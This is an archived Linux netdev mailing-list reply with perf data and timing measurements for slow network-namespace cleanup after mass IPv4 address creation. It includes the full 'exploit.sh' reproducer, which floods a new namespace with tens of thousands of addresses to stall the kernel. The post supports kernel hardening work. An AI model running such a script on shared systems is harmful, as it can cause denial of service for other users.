netdev.vger.kernel.org archive mirror
 help / color / mirror / Atom feed
From: Cyrill Gorcunov <gorcunov@gmail.com>
To: Eric Dumazet <eric.dumazet@gmail.com>,
	David Miller <davem@davemloft.net>
Cc: netdev@vger.kernel.org, solar@openwall.com, vvs@virtuozzo.com,
	avagin@virtuozzo.com, xemul@virtuozzo.com,
	vdavydov@virtuozzo.com, khorenko@virtuozzo.com
Subject: Re: [RFC] net: ipv4 -- Introduce ifa limit per net
Date: Wed, 9 Mar 2016 19:39:19 +0300	[thread overview]
Message-ID: <20160309163919.GJ2207@uranus.lan> (raw)
In-Reply-To: <20160306170641.GA8820@uranus.lan>

On Sun, Mar 06, 2016 at 08:06:41PM +0300, Cyrill Gorcunov wrote:
> > 
> > Well, this looks like LOCKDEP kernel. Are you really running LOCKDEP on
> > production kernels ?
> 

Hi Eric, David. Sorry for the delay. Finally I've measured the
latency on the hw. It's i7-2600 cpu with 16G of memory. Here
are the collected data.

---
Unpatched vanilla
=================

commit 7f02bf6b5f5de90b7a331759b5364e41c0f39bf9
Author: Linus Torvalds <torvalds@linux-foundation.org>
Date:   Tue Mar 8 09:41:20 2016 -0800

 Creating new addresses
 ----------------------
  19.26%  [kernel]                      [k] check_lifetime
  13.88%  [kernel]                      [k] __inet_insert_ifa
  13.01%  [kernel]                      [k] inet_rtm_newaddr

 Release
 -------
  20.96%  [kernel]                    [k] _raw_spin_lock
  17.79%  [kernel]                    [k] preempt_count_add
  14.79%  [kernel]                    [k] __local_bh_enable_ip
  13.08%  [kernel]                    [k] preempt_count_sub
   9.21%  [kernel]                    [k] nf_ct_iterate_cleanup
   3.15%  [kernel]                    [k] _raw_spin_unlock
   2.80%  [kernel]                    [k] nf_conntrack_lock
   2.67%  [kernel]                    [k] in_lock_functions
   2.63%  [kernel]                    [k] get_parent_ip
   2.26%  [kernel]                    [k] __inet_del_ifa
   2.17%  [kernel]                    [k] fib_del_ifaddr
   1.77%  [kernel]                    [k] _cond_resched

[root@s125 ~]# ./exploit.sh
START 4		addresses STOP 1457537580 1457537581
START 2704	addresses STOP 1457537584 1457537589
START 10404	addresses STOP 1457537602 1457537622
START 23104	addresses STOP 1457537657 1457537702
START 40804	addresses STOP 1457537784 1457537867
START 63504	addresses STOP 1457538048 1457538187

Patched (David's two patches)
=============================

 Creating new addresses
 ----------------------
  21.63%  [kernel]                    [k] check_lifetime
  14.31%  [kernel]                    [k] __inet_insert_ifa
  13.47%  [kernel]                    [k] inet_rtm_newaddr
   1.53%  [kernel]                    [k] check_preemption_disabled
   1.38%  [kernel]                    [k] page_fault
   1.27%  [kernel]                    [k] unmap_page_range

 Release
 -------
  24.26%  [kernel]                    [k] _raw_spin_lock
  17.55%  [kernel]                    [k] preempt_count_add
  14.81%  [kernel]                    [k] __local_bh_enable_ip
  14.17%  [kernel]                    [k] preempt_count_sub
  10.10%  [kernel]                    [k] nf_ct_iterate_cleanup
   3.00%  [kernel]                    [k] _raw_spin_unlock
   2.95%  [kernel]                    [k] nf_conntrack_lock
   2.86%  [kernel]                    [k] in_lock_functions
   2.73%  [kernel]                    [k] get_parent_ip
   1.91%  [kernel]                    [k] _cond_resched
   0.39%  [kernel]                    [k] task_tick_fair
   0.27%  [kernel]                    [k] native_write_msr_safe
   0.22%  [kernel]                    [k] rcu_check_callbacks
   0.20%  [kernel]                    [k] check_lifetime
   0.18%  [kernel]                    [k] check_preemption_disabled
   0.16%  [kernel]                    [k] hrtimer_active
   0.13%  [kernel]                    [k] __inet_insert_ifa
   0.13%  [kernel]                    [k] __memmove
   0.13%  [kernel]                    [k] inet_rtm_newaddr

[root@s125 ~]# ./exploit.sh
START 4		addresses STOP 1457539863 1457539864
START 2704	addresses STOP 1457539867 1457539872
START 10404	addresses STOP 1457539885 1457539905
START 23104	addresses STOP 1457539938 1457539980
START 40804	addresses STOP 1457540058 1457540132
START 63504	addresses STOP 1457540305 1457540418
---

The lockdep is turned off. And the script itself is
---
[root@s125 ~]# cat ./exploit.sh 
#!/bin/sh

if [ -z $1 ]; then
	for x in `seq 1 50 255`; do
		echo -n "START "
		(unshare -n /bin/sh exploit.sh $x)
		sleep 1
		for j in `seq 0 100`; do
			ip r > /dev/null
		done
		echo -n " "
		echo `date +%s`
	done
else
	for x in `seq 0 $1`; do
		for y in `seq 0 $1`; do
			ip a a 127.1.$x.$y dev lo
		done
	done
	num=`ip a l dev lo | grep -c "inet "`
	echo -n "$num addresses "
	echo -n "STOP "
	echo -n `date +%s`
	exit
fi
---

Note i run ip r in a cycle and added sleep before. On idle
machine this cycle takes ~1 second. But when run when kernel
cleans up the netnamespace it takea a way longer.

Also here is a graph for the data collected (blue line: unpatched
version, red -- patched. Of course with patched version it become
a way more better but still hanging).

https://docs.google.com/spreadsheets/d/1eyQDxjuZY2DHKYksGACpHDDcV1Bd92e-ZiY8ywPKshA/edit?usp=sharing

The perf output earlier shows the "perf top" when addresses
are created and when they are releasing.

The main problem still I think is that we allow to request
as many inet addresses as there is enough free memory and
of course kernel can't handle all in O(1) time, all resources
must be released so there always be some lagging moment. Thus
maybe introducing limits would be a good idea for sysadmins.

	Cyrill

  reply	other threads:[~2016-03-09 16:40 UTC|newest]

Thread overview: 50+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2016-03-04 21:39 [RFC] net: ipv4 -- Introduce ifa limit per net Cyrill Gorcunov
2016-03-04 22:50 ` David Miller
2016-03-05  0:08   ` Eric Dumazet
2016-03-05  4:11     ` David Miller
2016-03-05  7:18       ` Cyrill Gorcunov
2016-03-05 15:57       ` Cyrill Gorcunov
2016-03-05 16:33         ` David Miller
2016-03-05 17:00           ` Cyrill Gorcunov
2016-03-05 18:44           ` Cyrill Gorcunov
2016-03-06 10:09             ` Cyrill Gorcunov
2016-03-06 16:23               ` Eric Dumazet
2016-03-06 17:06                 ` Cyrill Gorcunov
2016-03-09 16:39                   ` Cyrill Gorcunov [this message]
2016-03-09 16:51                     ` Cyrill Gorcunov
2016-03-09 16:58                     ` Alexei Starovoitov
2016-03-09 17:09                       ` Cyrill Gorcunov
2016-03-09 17:24                         ` David Miller
2016-03-09 17:53                           ` Cyrill Gorcunov
2016-03-09 19:55                             ` Cyrill Gorcunov
2016-03-09 20:27                             ` David Miller
2016-03-09 20:41                               ` Cyrill Gorcunov
2016-03-09 20:47                                 ` David Miller
2016-03-09 20:57                                   ` Cyrill Gorcunov
2016-03-09 21:10                                     ` David Miller
2016-03-09 21:16                                       ` Cyrill Gorcunov
2016-03-10 10:20                                         ` Cyrill Gorcunov
2016-03-10 11:03                                           ` Cyrill Gorcunov
2016-03-10 15:09                                             ` Cyrill Gorcunov
2016-03-10 18:01                                               ` David Miller
2016-03-10 18:48                                                 ` Cyrill Gorcunov
2016-03-10 19:02                                                 ` Cong Wang
2016-03-10 19:55                                                   ` David Miller
2016-03-10 20:01                                                     ` Cyrill Gorcunov
2016-03-10 20:03                                                       ` David Miller
2016-03-10 20:13                                                         ` Cyrill Gorcunov
2016-03-10 20:19                                                           ` Cyrill Gorcunov
2016-03-10 21:05                                                           ` David Miller
2016-03-10 21:19                                                             ` Cyrill Gorcunov
2016-03-10 21:59                                                               ` Cyrill Gorcunov
2016-03-10 22:36                                                                 ` David Miller
2016-03-10 22:40                                                                   ` Cyrill Gorcunov
2016-03-11 20:40                                                                     ` David Miller
2016-03-11 20:58                                                                       ` Florian Westphal
2016-03-11 21:00                                                                       ` Cyrill Gorcunov
2016-03-11 21:22                                                                       ` Cyrill Gorcunov
2016-03-11 21:59                                                                         ` Cyrill Gorcunov
2016-03-14  3:29                                                                           ` David Miller
2016-03-10 21:09                                                     ` Cong Wang
2016-03-09 17:19                     ` David Miller
2016-03-05  6:58   ` Cyrill Gorcunov

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=20160309163919.GJ2207@uranus.lan \
    --to=gorcunov@gmail.com \
    --cc=avagin@virtuozzo.com \
    --cc=davem@davemloft.net \
    --cc=eric.dumazet@gmail.com \
    --cc=khorenko@virtuozzo.com \
    --cc=netdev@vger.kernel.org \
    --cc=solar@openwall.com \
    --cc=vdavydov@virtuozzo.com \
    --cc=vvs@virtuozzo.com \
    --cc=xemul@virtuozzo.com \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).